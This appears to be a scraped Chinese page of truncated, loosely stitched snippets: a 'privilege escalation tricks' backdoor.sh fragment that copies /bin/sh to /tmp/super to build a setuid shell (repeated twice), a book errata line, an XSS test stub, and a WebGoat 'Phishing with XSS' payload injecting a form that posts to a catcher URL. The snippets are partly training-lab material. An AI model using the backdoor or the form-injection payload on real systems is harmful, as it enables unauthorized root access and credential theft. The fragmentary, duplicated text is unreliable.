提权的奇淫巧计
系统原程序:sudo、su、。。。这些具有suid标志的程序
后门脚本backdoor.sh
#!/usr/bin/sh
cp /usr/bin/sh /tmp/super
(chown `whoami`:`whoami` /tmp/super 2>/dev/null;ch......
系统原程序:sudo、su、。。。这些具有suid标志的程序
后门脚本backdoor.sh
#!/usr/bin/sh
cp /usr/bin/sh /tmp/super
(chown `whoami`:`whoami` /tmp/super 2>/dev/null;ch......
原文:https://github.com/web2hack/trac#201367
2013/6/7
p282倒数第三行的replacdState()改为replaceState()
感谢:@lovelessyuyu反馈
自己测测吧。
//xss_test.php
<html>
<head></head>......
Phishing with XSS
</form><form action="http://127.0.0.1:8888/webgoat/catcher?PROPERTY=yes" method="post"><br>&......